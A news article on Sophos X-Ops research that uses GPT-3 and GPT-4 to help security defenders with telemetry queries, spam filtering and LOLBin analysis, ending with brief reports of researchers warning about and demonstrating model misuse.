A new research report published on Monday demonstrates how cybersecurity professionals can use GPT-4, the language model underlying the ChatGPT framework, which was launched earlier this week by Artificial Intelligence (AI) research firm OpenAI, as a co-pilot to help defeat attackers.
Sophos’ research details projects developed by its threat intelligence services Sophos X-Ops that use GPT-3’s large language models to simplify the search for malicious activity in security software datasets, more accurately filter spam and speed up analysis of “living off the land” binary (LOLBin) attacks.
LoLBins are non-malicious binaries that are local to the operating system and have been used and exploited by cyber criminals and crime groups to conceal their malicious activity.
Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring,” said Sean Gallagher, principal threat researcher, Sophos, speaking on the new initiative. He said that Sophos researchers have been observing “AI as an ally rather than an enemy for defenders”, making it a cornerstone technology for cyber security professionals. “The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings, he said.
Sophos X-Ops researchers, including Sophos’ AI Principal Data Scientist Younghoo Lee, have been working on three prototype projects that show GPT-3’s potential as a cybersecurity defender’s assistant. All three employ a technique known as “few-shot learning” to train the AI model with only a few data samples, eliminating the need for a large volume of pre-classified data.
Sophos tested the few-shot learning method on a natural language query interface for sifting through malicious activity in security software telemetry; specifically, Sophos tested the model against its endpoint detection and response product. Defenders can use this interface to filter through telemetry using simple English commands, eliminating the need for defenders to understand SQL or the underlying structure of a database.
Sophos then tested a new spam filter using ChatGPT and discovered that, when compared to other spam filtering machine learning models, the filter using GPT-3 was significantly more accurate. Finally, Sophos researchers were able to develop a program that simplified the process of reverse-engineering LOLBins command lines. Such reverse engineering is notoriously difficult, but it is also critical for understanding LOLBins’ behavior — and preventing similar attacks in the future.
One of the growing concerns within security operation centres is the sheer amount of ‘noise’ coming in. There are just too many notifications and detections to sort through, and many companies are dealing with limited resources, said Gallagher.
We’ve proved that, with something like GPT-3, we can simplify certain labour-intensive processes and give back valuable time to defenders. We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments. In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts, he added.
To be sure, other cyber security researchers have highlighted the impact of ChatGPT and GPT-4 on security professionals in recent months. According to Check Point Research, an Israeli cyber security firm, despite improvements in safety metrics, GPT-4 still poses the risk of being manipulated by cyber criminals to generate malicious code.
Cyber security experts have also warned that such risks may arise as security threats become more sophisticated, as a result of GPT-4’s improved reasoning and language comprehension abilities, as well as its long-form text generation ability, which can be used to write more complex code for malicious software programs.
Earlier in January, CyberArk researchers detailed how they circumvented ChatGPT’s content filters and got it to generate what they called “functional code” to inject a DLL into explorer.exe. The researchers then used the chatbot to generate polymorphic code that antimalware software finds difficult to detect and deal with.